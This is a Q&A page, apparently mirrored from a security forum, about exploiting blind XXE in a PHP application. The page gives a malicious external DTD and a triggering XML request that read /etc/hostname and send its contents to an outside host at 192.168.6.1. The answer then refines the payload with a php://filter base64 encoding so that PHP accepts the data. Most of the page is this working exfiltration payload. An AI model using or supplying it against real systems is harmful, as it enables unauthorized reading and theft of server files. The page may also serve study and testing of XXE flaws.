TransWikia.com

PHP Blind XXE Exploitation: Invalid URI in Entity

Information Security Asked by user3207874 on October 28, 2021

When attempting to exploit blind XXE as explained in this article, I got an error in my apache logs:

PHP Warning: DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity

The DTD file:

<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY % send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

The request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>

Why can’t I send the /etc/hostname?

One Answer

I found out the issue is that /etc/hostname has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.

I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.

In fact, you can use the php:// protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:

<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;

Answered by user3207874 on October 28, 2021

Add your own answers!

Ask a Question

Get help from others!

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP